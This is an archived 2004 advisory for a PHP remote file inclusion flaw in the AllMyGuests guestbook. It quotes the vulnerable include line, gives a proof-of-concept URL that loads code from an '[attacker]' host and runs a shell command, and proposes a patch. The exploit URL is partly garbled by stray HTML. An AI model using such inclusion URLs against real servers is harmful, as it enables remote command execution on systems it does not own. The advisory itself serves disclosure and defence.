TUCoPS :: Web :: Guestbooks :: hack1247.htm

AllMyGuests PHP Code Injection vulnerability
AllMyGuests PHP Code Injection vulnerability



******** AllMyGuests PHP Code Injection vulnerability ********



Product : AllMyGuests

Vendor : www.php-resource.net 

Date : February 14, 2004

Problem : PHP Code Injection

Vendor Contacted ? : No



************************** Source ****************************



in /include/info.inc.php



--------------------------------------------------------------



$AMG_info_get = require_once("$_AMGconfig[cfg_serverpath]"."/include/template.inc.php");



--------------------------------------------------------------



************************** Exploit ***************************



http://[target]/allmylinks/include/info.inc.php?_AMGconfig[cfg_serverp< a href="ath]=http://[attacker]/&cmd=uname%20-a">ath]=http://[attacker]/&cmd=uname%20-a 



in http://[attacker]/include/template.inc.php have : 



------------------------







------------------------



************************** Impact ****************************



Malicious user execute arbitrary commands on the server .



************************* Solution ***************************



in /include/info.inc.php replace 



$AMG_info_get = require_once("$_AMGconfig[cfg_serverpath]"."/include/template.inc.php");





for





if (isset($_AMGconfig[cfg_serverpath])){

  die("Don\'t Hack it :)");

}



$AMG_info_get = require_once("$_AMGconfig[cfg_serverpath]"."/include/template.inc.php"); 



************************** Credits ****************************



bnfx : bnfx@antisocial.com 



Mad_Skater : m4dsk4t3r@hotmail.com 



TechTeam Brazilian Crew .


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH